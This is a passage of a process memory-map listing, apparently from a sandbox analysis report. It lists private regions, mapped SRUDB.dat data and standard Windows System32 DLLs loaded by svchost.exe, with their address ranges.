0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 4397 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4398 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 4399 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4400 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 4401 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4402 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4403 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4404 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 4405 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 4406 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 4407 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 4408 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4409 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 4410 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4411 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4412 start_va = 0x2d00000 end_va = 0x3036fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4413 start_va = 0x3040000 end_va = 0x3040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 4414 start_va = 0x3050000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 4415 start_va = 0x3070000 end_va = 0x3070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 4416 start_va = 0x3080000 end_va = 0x3081fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 4417 start_va = 0x3090000 end_va = 0x309ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4418 start_va = 0x30a0000 end_va = 0x30affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4419 start_va = 0x30b0000 end_va = 0x30bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4420 start_va = 0x30c0000 end_va = 0x30cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4421 start_va = 0x30d0000 end_va = 0x30dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4422 start_va = 0x30e0000 end_va = 0x30effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4423 start_va = 0x30f0000 end_va = 0x30fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4424 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4425 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 4426 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 4427 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 4428 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 4429 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 4430 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 4431 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4432 start_va = 0x3900000 end_va = 0x390ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4433 start_va = 0x3910000 end_va = 0x391ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4434 start_va = 0x3920000 end_va = 0x392ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4435 start_va = 0x3930000 end_va = 0x393ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4436 start_va = 0x3940000 end_va = 0x394ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4437 start_va = 0x3950000 end_va = 0x395ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4438 start_va = 0x3960000 end_va = 0x396ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srudb.dat" filename = "\\Windows\\System32\\sru\\SRUDB.dat" (normalized: "c:\\windows\\system32\\sru\\srudb.dat") Region: id = 4439 start_va = 0x3970000 end_va = 0x3970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 4440 start_va = 0x39a0000 end_va = 0x39a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 4441 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 4442 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 4443 start_va = 0x3c00000 end_va = 0x3e01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 4444 start_va = 0x3e10000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 4445 start_va = 0x3f10000 end_va = 0x4f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 4446 start_va = 0x4f10000 end_va = 0x4f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 4447 start_va = 0x4f90000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 4448 start_va = 0x5090000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 4449 start_va = 0x5190000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 4450 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 4451 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 4452 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 4453 start_va = 0x5600000 end_va = 0x5701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 4454 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4455 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4456 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4457 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4458 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4459 start_va = 0x7ff847530000 end_va = 0x7ff8475cbfff monitored = 0 entry_point = 0x7ff8475896a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 4460 start_va = 0x7ff84b040000 end_va = 0x7ff84b08ffff monitored = 0 entry_point = 0x7ff84b042580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 4461 start_va = 0x7ff84d690000 end_va = 0x7ff84d6a2fff monitored = 0 entry_point = 0x7ff84d692570 region_type = mapped_file name = "srumapi.dll" filename = "\\Windows\\System32\\srumapi.dll" (normalized: "c:\\windows\\system32\\srumapi.dll") Region: id = 4462 start_va = 0x7ff84d6b0000 end_va = 0x7ff84d6c4fff monitored = 0 entry_point = 0x7ff84d6b3040 region_type = mapped_file name = "energyprov.dll" filename = "\\Windows\\System32\\energyprov.dll" (normalized: "c:\\windows\\system32\\energyprov.dll") Region: id = 4463 start_va = 0x7ff84dbf0000 end_va = 0x7ff84dee8fff monitored = 0 entry_point = 0x7ff84dcb7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 4464 start_va = 0x7ff84def0000 end_va = 0x7ff84df26fff monitored = 0 entry_point = 0x7ff84defa9e0 region_type = mapped_file name = "srumsvc.dll" filename = "\\Windows\\System32\\srumsvc.dll" (normalized: "c:\\windows\\system32\\srumsvc.dll") Region: id = 4465 start_va = 0x7ff84df50000 end_va = 0x7ff84df5cfff monitored = 0 entry_point = 0x7ff84df53da0 region_type = mapped_file name = "pots.dll" filename = "\\Windows\\System32\\pots.dll" (normalized: "c:\\windows\\system32\\pots.dll") Region: id = 4466 start_va = 0x7ff84df60000 end_va = 0x7ff84df68fff monitored = 0 entry_point = 0x7ff84df61620 region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll") Region: id = 4467 start_va = 0x7ff84df70000 end_va = 0x7ff84df7bfff monitored = 0 entry_point = 0x7ff84df73ab0 region_type = mapped_file name = "ncuprov.dll" filename = "\\Windows\\System32\\ncuprov.dll" (normalized: "c:\\windows\\system32\\ncuprov.dll") Region: id = 4468 start_va = 0x7ff84dfa0000 end_va = 0x7ff84dfadfff monitored = 0 entry_point = 0x7ff84dfa3c90 region_type = mapped_file name = "wpnsruprov.dll" filename = "\\Windows\\System32\\wpnsruprov.dll" (normalized: "c:\\windows\\system32\\wpnsruprov.dll") Region: id = 4469 start_va = 0x7ff84dfb0000 end_va = 0x7ff84dfc8fff monitored = 0 entry_point = 0x7ff84dfbc2f0 region_type = mapped_file name = "appsruprov.dll" filename = "\\Windows\\System32\\appsruprov.dll" (normalized: "c:\\windows\\system32\\appsruprov.dll") Region: id = 4470 start_va = 0x7ff84dfd0000 end_va = 0x7ff84dfeafff monitored = 0 entry_point = 0x7ff84dfdc6a0 region_type = mapped_file name = "eeprov.dll" filename = "\\Windows\\System32\\eeprov.dll" (normalized: "c:\\windows\\system32\\eeprov.dll") Region: id = 4471 start_va = 0x7ff84e000000 end_va = 0x7ff84e013fff monitored = 0 entry_point = 0x7ff84e005d60 region_type = mapped_file name = "nduprov.dll" filename = "\\Windows\\System32\\nduprov.dll" (normalized: "c:\\windows\\system32\\nduprov.dll") Region: id = 4472 start_va = 0x7ff84e020000 end_va = 0x7ff84e185fff monitored = 0 entry_point = 0x7ff84e0679f0 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 4473 start_va = 0x7ff84f940000 end_va = 0x7ff84f97ffff monitored = 0 entry_point = 0x7ff84f956c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4474 start_va = 0x7ff84fd70000 end_va = 0x7ff84fd7bfff monitored = 0 entry_point = 0x7ff84fd716a0 region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll") Region: id = 4475 start_va = 0x7ff84ff20000 end_va = 0x7ff84ff3cfff monitored = 0 entry_point = 0x7ff84ff26190 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4476 start_va = 0x7ff850020000 end_va = 0x7ff850027fff monitored = 0 entry_point = 0x7ff850021ab0 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4477 start_va = 0x7ff850030000 end_va = 0x7ff850037fff monitored = 0 entry_point = 0x7ff8500310a0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4478 start_va = 0x7ff850040000 end_va = 0x7ff850049fff monitored = 0 entry_point = 0x7ff8500415c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 4479 start_va = 0x7ff850270000 end_va = 0x7ff85029ffff monitored = 0 entry_point = 0x7ff85027a670 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll") Region: id = 4480 start_va = 0x7ff851c00000 end_va = 0x7ff851c09fff monitored = 0 entry_point = 0x7ff851c03070 region_type = mapped_file name = "adhapi.dll" filename = "\\Windows\\System32\\adhapi.dll" (normalized: "c:\\windows\\system32\\adhapi.dll") Region: id = 4481 start_va = 0x7ff851c10000 end_va = 0x7ff851c18fff monitored = 0 entry_point = 0x7ff851c121d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 4482 start_va = 0x7ff851c20000 end_va = 0x7ff851c54fff monitored = 0 entry_point = 0x7ff851c2a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 4483 start_va = 0x7ff851c60000 end_va = 0x7ff851d3cfff monitored = 0 entry_point = 0x7ff851c95630 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 4484 start_va = 0x7ff852090000 end_va = 0x7ff85215afff monitored = 0 entry_point = 0x7ff8520b87f0 region_type = mapped_file name = "bfe.dll" filename = "\\Windows\\System32\\BFE.DLL" (normalized: "c:\\windows\\system32\\bfe.dll") Region: id = 4485 start_va = 0x7ff8521a0000 end_va = 0x7ff852232fff monitored = 0 entry_point = 0x7ff8521a9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4486 start_va = 0x7ff8524b0000 end_va = 0x7ff8524bdfff monitored = 0 entry_point = 0x7ff8524b1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4487 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4488 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4489 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4490 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4491 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4492 start_va = 0x7ff852dc0000 end_va = 0x7ff852e14fff monitored = 0 entry_point = 0x7ff852dc3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4493 start_va = 0x7ff8537e0000 end_va = 0x7ff8537f5fff monitored = 0 entry_point = 0x7ff8537e1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4494 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4495 start_va = 0x7ff854e40000 end_va = 0x7ff854f4dfff monitored = 0 entry_point = 0x7ff854e8eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 4496 start_va = 0x7ff855250000 end_va = 0x7ff855385fff monitored = 0 entry_point = 0x7ff85527f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4497 start_va = 0x7ff855480000 end_va = 0x7ff8554e3fff monitored = 0 entry_point = 0x7ff855495ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4498 start_va = 0x7ff855b80000 end_va = 0x7ff855c11fff monitored = 0 entry_point = 0x7ff855bca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4499 start_va = 0x7ff855d30000 end_va = 0x7ff855d4dfff monitored = 0 entry_point = 0x7ff855d35190 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 4500 start_va = 0x7ff855ee0000 end_va = 0x7ff855f9efff monitored = 0 entry_point = 0x7ff855f01c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4501 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 4502 start_va = 0x7ff8576d0000 end_va = 0x7ff85778dfff monitored = 0 entry_point = 0x7ff857712d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4503 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4504 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4505 start_va = 0x7ff858570000 end_va = 0x7ff8585a1fff monitored = 0 entry_point = 0x7ff858582340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4506 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4507 start_va = 0x7ff858720000 end_va = 0x7ff858817fff monitored = 0 entry_point = 0x7ff85872d580 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 4508 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4509 start_va = 0x7ff858990000 end_va = 0x7ff8589d8fff monitored = 0 entry_point = 0x7ff85899a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 4510 start_va = 0x7ff858b00000 end_va = 0x7ff858b0bfff monitored = 0 entry_point = 0x7ff858b027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4511 start_va = 0x7ff858be0000 end_va = 0x7ff858c10fff monitored = 0 entry_point = 0x7ff858be7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4512 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4513 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4514 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4515 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4516 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4517 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4518 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4519 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4520 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4521 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4522 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4523 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4524 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4525 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4526 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4527 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4528 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4529 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = 